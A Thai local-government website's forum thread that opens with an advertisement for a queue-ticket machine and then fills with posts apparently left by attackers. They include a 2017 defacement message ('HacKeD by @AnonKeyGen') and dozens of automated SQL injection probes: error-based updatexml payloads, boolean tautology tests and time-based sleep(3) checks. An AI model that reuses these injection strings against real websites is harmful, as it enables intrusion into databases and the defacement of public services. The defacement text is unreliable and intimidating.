หน้าแรก    |    ข้อมูลทั่วไป    |    บุคลากร    |    ข่าวประชาสัมพันธ์    |    กิจกรรม    |    ติดต่อเรา   นายธงชัย นนทนาคร
นายกองค์การบริหารส่วนตำบล
คลองห้า
อำเภอคลองหลวง จังหวัดปทุมธานี

หน้าแรก

ข้อมูลทั่วไป
- ประวัติและตราสัญลักษณ์
- โครงสร้างพื้นฐาน
- ลักษณะที่ตั้ง
- ลักษณะสังคม
- ลักษณะเศรษฐกิจ
- ข้อมูลหมู่บ้าน
- ผลิตภัณฑ์หมู่บ้าน
- สถานที่สำคัญ
- รวมภาพ อบต.

บุคลากร
- โครงสร้างการบริหาร
- คณะผู้บริหาร
- สมาชิกสภา
- หัวหน้าส่วนราชการ
- สำนักปลัด
- กองคลัง
- กองช่าง
- กองการศึกษาศาสนาและวัฒนธรรม
- กองสาธารณสุขและสิ่งแวดล้อม
- กองสวัสดิการสังคม

ประชาสัมพันธ์
- ข่าวประชาสัมพันธ์
- กิจกรรม
- ประกาศจัดซื้อจัดจ้าง
- กระดานสนทนา
- ร้องเรียน / ร้องทุกข์

ข้อมูลสำหรับประชาชน
- สำนักปลัด
- กองคลัง
- กองช่าง
-กองการศึกษา ศาสนาและวัฒนธรรม
- กองสาธารณสุขและสิ่งแวดล้อม
- ลดขั้นตอนการปฏิบัติงาน
- ดาวน์โหลดแบบฟอร์ม

แผนพัฒนาท้องถิ่น
- แผนพัฒนาสามปี
- แผนการดำเนินงานประจำปี
- แผนอัตรากำลังสามปี
- แผนยุทธศาสตร์การพัฒนา
- ข้อบัญญัติงบประมาณ
- ข้อบัญญัติฯการจัดการสิ่งปฏิกูลและมูลฝอย
- รายงานการติดตามและประเมินผลแผนพัฒนา

กฏหมายและระเบียบ
- พ.ร.บ./พ.ร.ก.
- กฎกระทรวงและระเบียบ
- คำสั่ง อบต.

ติดต่อเรา

ลิงค์ที่น่าสนใจ


หนังสือพิมพ์


สถานีโทรทัศน์


กระทรวงต่างๆ


จังหวัดทั่วไทย


เว็บช่วยค้นหา


เครื่องกดบัตรคิว : อบต.คลองห้า อำเภอคลองหลวง จังหวัด ปทุมธานี

เครื่องกดบัตรคิว โดย Klong5

# 0 :
เครื่องกดบัตรคิว ระบบคิวมาตรฐานสากล
 เครื่องกดบัตรคิวนี้เป็นระบบมัลติคิว(Multi-Que)พัฒนาขึ้นโดยความร่วมมือของบริษัท พีอาร์เอ็น เทคโนโลยี จำกัด
 ผู้น้ำด้านเครื่องพิมพ์สมุดคู่ฝาก สมุดเช็คยี่ห้อCompuprint และผู้นำด้านระบบเซิฟเวอร์กับบริษัท ไทยธนโชติ ไอที จำกัด
มีจุดประสงค์เพื่อการปฏิวัติระบบเรียกคิวให้ก้าวสู่มาตรฐานสากล
1ชุดประกอบด้วย4องค์ประกอบ
1.หน้าจอLED 40นิ้ว  (Q-Multishow)  ผู้ใช้สามารถเลือกให้แสดงผลออกบนหน้าจอคอมหรือทีวีก็ได้แล้วแต่ต้องการ
                                                              *ตัวเครื่องสามารถเปลี่ยนสีได้โดยผู้ใช้เองตามต้องการ
                                                              *สามารถนำวิดีโอไฟล์มาเล่นบนหน้าจอได้
2.หน้าจอหรือตู้พิมพ์บัตรคิว (Q-Print) คือหน้าจอตู้พิมพ์บัตรคิวเป็นระบบสัมผัส Touch Screen ตัวเครื่องสามารถใช้
                                                              กระดาษความร้อน(สลิป)หาซื้อได้จากร้านค้าทั่วไปทำให้ประหยัดค่าใช้จ่าย       
3.ลำโพง                                                * ลำโพงมีหน้าที่ส่งเสียงเรียกคิวที่หน้าเคาร์เตอร์กดเรียกตามคิวนั้นๆ      
4.ชุดควบคุมการทำงาน                          *การตั้งช่องบริการ
                                                               *การตั้งชื่อกิจการ
                                                               *การตั้งค่าข้อความประชาสัมพันธ์วิดีโอที่ใช้เล่น
                                                               *สรุปรายงาน
                                                               *การเรียกคิว
                *****หรือจะสั่งเครื่องกดความพึงพอใจควบคู่กับเครื่องกดบัตรคิวเข้ามาด้วยก็ได้ค่ะ*****
สนใจติดต่อ 086-3267901 เปรียว ,086-4797162 เนย ,086-3094503 ยุ้ย,086-3094502 อัน086-3094502
 บริษัท พีอาร์เอ็น เทคโนโลยี จำกัด
Tel : 0-29063121-22 Fax : 0-29063132
 Email : info@prn-tech.com รับสมัครตัวแทนจำหน่ายทั่วประเทศ http://www.passbookprinterthai.com/
 


โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2016-12-27 09:33:29
# 1 :
HacKeD by @AnonKeyGenYOUR WEBSITE.
HAS BEEN HACKED.


Hi man, your website has been hacked, and
I want to help you, if you are ready
please read the file info.txt in your site
to know what is your vulnerability and
how to fix this.
WE DO NOT FORGET ● WE DO NOT FORGIVE ● EXPECT US


โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-01-16 23:24:48
# 2 :
Damn, I wish I could think of somitheng smart like that!

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-07 07:07:10
# 3 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:31:54
# 4 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:32:09
# 5 :
WCRTEXTAREATESTINPUT3429584" oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR "

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:33:29
# 6 :
WCRTEXTAREATESTINPUT3429584") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:33:37
# 7 :
WCRTEXTAREATESTINPUT3429584") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:33:48
# 8 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:34:15
# 9 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:34:20
# 10 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:34:29
# 11 :
1

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:34:50
# 12 :
1

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:34:56
# 13 :
WCRTEXTAREATESTINPUT3429584" aNd 8183847=8183847 aNd "6199"="6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:35:23
# 14 :
WCRTEXTAREATESTINPUT3429584" aNd 8183847=9527815 aNd "6199"="6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:35:41
# 15 :
99999999" oR 5866493=5866493--

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:35:51
# 16 :
99999999" oR 5866493=9120240--

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:11
# 17 :
WCRTEXTAREATESTINPUT3429584") aNd 1794511=1794511 aNd ("6199")=("6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:13
# 18 :
WCRTEXTAREATESTINPUT3429584") aNd 1794511=8699342 aNd ("6199")=("6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:28
# 19 :
99999999") oR 7115589=7115589 aNd ("6199")=("6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:31
# 20 :
99999999") oR 7115589=3521563 aNd ("6199")=("6199

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:39
# 21 :
99999999") oR 2725453=2725453--

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:48
# 22 :
99999999") oR 2725453=8185665--

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:36:56
# 23 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:06
# 24 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:14
# 25 :
" oR 5795728=5795728 aNd "%"="

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:21
# 26 :
" oR 5795728=2174029 aNd "%"="

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:27
# 27 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:30
# 28 :
WCRTEXTAREATESTINPUT3429584 aNd if(length(0x574352575653)>1,sleep(3),0)

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:47
# 29 :
WCRTEXTAREATESTINPUT3429584 aNd if(length(0x574352575653)<1,sleep(3),0)

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:37:54
# 30 :
WCRTEXTAREATESTINPUT3429584 oR if(length(0x574352575653)>1,sleep(3),0)

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:38:07
# 31 :
WCRTEXTAREATESTINPUT3429584 oR if(length(0x574352575653)<1,sleep(3),0)

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:38:23
# 32 :
WCRTEXTAREATESTINPUT3429584" aNd if(length(0x574352575653)>1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:40:00
# 33 :
WCRTEXTAREATESTINPUT3429584" aNd if(length(0x574352575653)<1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:40:06
# 34 :
WCRTEXTAREATESTINPUT3429584" oR if(length(0x574352575653)>1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:40:15
# 35 :
WCRTEXTAREATESTINPUT3429584" oR if(length(0x574352575653)<1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:40:27
# 36 :
WCRTEXTAREATESTINPUT3429584") oR if(length(0x574352575653)>1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:41:40
# 37 :
WCRTEXTAREATESTINPUT3429584") aNd if(length(0x574352575653)<1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:41:41
# 38 :
WCRTEXTAREATESTINPUT3429584") oR if(length(0x574352575653)<1,sleep(3),0) --

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:41:53
# 39 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:43:10
# 40 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:43:11
# 41 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:44:19
# 42 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:45:35
# 43 :
WCRTEXTAREATESTINPUT3429584" aNd if(length(0x574352575653)>1,sleep(3),0) oR "

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:46:06
# 44 :
WCRTEXTAREATESTINPUT3429584") aNd if(length(0x574352575653)>1,sleep(3),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:48:45
# 45 :
WCRTEXTAREATESTINPUT3429584") aNd if(length(0x574352575653)<1,sleep(3),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:49:20
# 46 :
WCRTEXTAREATESTINPUT3429584") oR if(length(0x574352575653)<1,sleep(3),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:50:32
# 47 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:50:32
# 48 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:51:00
# 49 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:53:39
# 50 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:53:40
# 51 :
WCRTEXTAREATESTINPUT3429584

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 21:55:35
# 52 :
WCRTEXTAREATESTINPUT2110040

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:14
# 53 :
WCRTEXTAREATESTINPUT2110040" oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR "

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:18
# 54 :
WCRTEXTAREATESTINPUT2110040") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:23
# 55 :
WCRTEXTAREATESTINPUT2110040") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:31
# 56 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:37
# 57 :
0

โพสข้อความโดยคุณ : Klong5 เมื่อเวลา : 2017-07-12 23:48:45
# 58 :
WCRTEXTAREATESTINPUT2110040" aNd 6916444=6916444 aNd "6199"="6199

โพสข้อความโดยคุณ : Klong5